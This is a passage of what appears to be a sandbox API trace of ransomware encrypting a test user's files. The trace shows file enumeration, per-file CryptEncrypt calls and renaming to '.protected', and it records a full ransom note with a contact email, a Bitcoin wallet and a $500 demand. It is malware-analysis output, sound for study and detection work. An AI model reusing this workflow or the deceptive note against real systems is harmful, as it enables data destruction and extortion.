1 [0091.088] lstrcmpiW (lpString1="YJtd.bmp", lpString2="$Recycle.bin") returned 1 [0091.089] lstrcmpiW (lpString1="YJtd.bmp", lpString2="System Volume Information") returned 1 [0091.089] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp") returned 58 [0091.089] StrStrIW (lpFirst="YJtd.bmp", lpSrch=".protected") returned 0x0 [0091.089] lstrcmpW (lpString1="YJtd.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0091.089] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.089] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yjtd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp") returned 58 [0091.089] StrStrW (lpFirst="YJtd.bmp", lpSrch=".txt") returned 0x0 [0091.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp") returned 58 [0091.089] StrStrW (lpFirst="YJtd.bmp", lpSrch=".rar") returned 0x0 [0091.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp") returned 58 [0091.089] StrStrW (lpFirst="YJtd.bmp", lpSrch=".zip") returned 0x0 [0091.089] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.090] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.090] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.090] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.090] WriteFile (in: hFile=0xd4, 
lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.091] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.091] CloseHandle (hObject=0xd4) returned 1 [0091.091] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp.protected") returned 68 [0091.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yjtd.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yjtd.bmp.protected")) returned 1 [0091.101] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.101] lstrcmpiW (lpString1="Z4lBp9.wav", lpString2="Windows") returned 1 [0091.101] lstrcmpiW (lpString1="Z4lBp9.wav", lpString2="Program Files") returned 1 [0091.101] lstrcmpiW (lpString1="Z4lBp9.wav", lpString2="Program Files (x86)") returned 1 [0091.101] lstrcmpiW (lpString1="Z4lBp9.wav", lpString2="$Recycle.bin") returned 1 [0091.101] lstrcmpiW (lpString1="Z4lBp9.wav", lpString2="System Volume Information") returned 1 [0091.101] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav") returned 60 [0091.101] StrStrIW (lpFirst="Z4lBp9.wav", lpSrch=".protected") returned 0x0 [0091.101] lstrcmpW (lpString1="Z4lBp9.wav", lpString2="RESTORE_FILES.txt") returned 1 [0091.101] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.101] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z4lbp9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.101] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav") returned 60 [0091.102] StrStrW (lpFirst="Z4lBp9.wav", lpSrch=".txt") returned 0x0 [0091.102] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav") returned 60 [0091.102] StrStrW (lpFirst="Z4lBp9.wav", lpSrch=".rar") returned 0x0 [0091.102] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav") returned 60 [0091.102] StrStrW (lpFirst="Z4lBp9.wav", lpSrch=".zip") returned 0x0 [0091.102] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.102] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.102] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.103] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.103] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.103] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.103] CloseHandle (hObject=0xd4) returned 1 [0091.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav.protected") returned 70 [0091.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z4lbp9.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z4lbp9.wav.protected")) returned 1 [0091.105] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.105] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.105] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RESTORE_FILES.txt") returned 67 [0091.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.106] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.106] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.107] lstrlenA (lpString="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") returned 684 [0091.107] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.107] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.107] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.107] CloseHandle (hObject=0xb4) returned 1 [0091.107] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.107] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.107] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\RESTORE_FILES.txt") returned 59 [0091.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.108] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.108] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.108] lstrlenA (lpString="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") returned 684 [0091.108] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.108] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.108] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0091.108] CloseHandle (hObject=0xa4) returned 1 [0091.109] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.109] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0091.109] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0091.109] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0091.109] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0091.109] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0091.109] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned 50 [0091.109] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0091.109] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0091.109] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*") returned 52 [0091.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0091.109] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.109] lstrcmpiW (lpString1="Contacts", lpString2="Windows") returned -1 [0091.109] lstrcmpiW (lpString1="Contacts", lpString2="Program Files") returned -1 [0091.109] lstrcmpiW (lpString1="Contacts", lpString2="Program Files (x86)") returned -1 [0091.109] lstrcmpiW (lpString1="Contacts", lpString2="$Recycle.bin") returned 1 [0091.109] lstrcmpiW (lpString1="Contacts", lpString2="System Volume Information") returned -1 [0091.109] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Contacts") returned 42 [0091.109] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0091.109] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0091.109] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*") returned 44 [0091.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.109] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.109] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.110] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.110] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.110] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.110] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\.") returned 44 [0091.110] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.110] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.110] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.110] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.110] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.110] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.110] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.110] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.110] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.110] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.110] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.110] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\..") returned 45 [0091.110] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.110] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.110] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.110] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.110] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.110] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.110] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.110] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="Windows") returned -1 [0091.111] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="Program Files") returned -1 [0091.111] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="Program Files (x86)") returned -1 [0091.111] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="$Recycle.bin") returned 1 [0091.111] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="System Volume Information") returned -1 [0091.111] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0091.111] StrStrIW (lpFirst="Aclviho ASldjfl.contact", lpSrch=".protected") returned 0x0 [0091.111] lstrcmpW (lpString1="Aclviho ASldjfl.contact", lpString2="RESTORE_FILES.txt") returned -1 [0091.111] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.111] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.111] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 
[0091.111] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch=".txt") returned 0x0 [0091.111] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0091.111] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch=".rar") returned 0x0 [0091.111] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0091.111] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch=".zip") returned 0x0 [0091.111] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x49a, lpOverlapped=0x0) returned 1 [0091.118] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.118] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x49a, lpOverlapped=0x0) returned 1 [0091.119] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.119] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.119] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.119] CloseHandle (hObject=0xb4) returned 1 [0091.120] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.protected") returned 76 [0091.120] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.protected")) returned 1 [0091.120] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.120] lstrcmpiW (lpString1="Administrator.contact", lpString2="Windows") returned -1 [0091.120] lstrcmpiW (lpString1="Administrator.contact", lpString2="Program Files") returned -1 [0091.120] lstrcmpiW (lpString1="Administrator.contact", lpString2="Program Files (x86)") returned -1 [0091.120] lstrcmpiW (lpString1="Administrator.contact", lpString2="$Recycle.bin") returned 1 [0091.120] lstrcmpiW (lpString1="Administrator.contact", lpString2="System Volume Information") returned -1 [0091.120] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0091.120] StrStrIW (lpFirst="Administrator.contact", lpSrch=".protected") returned 0x0 [0091.120] lstrcmpW (lpString1="Administrator.contact", lpString2="RESTORE_FILES.txt") returned -1 [0091.120] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.120] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
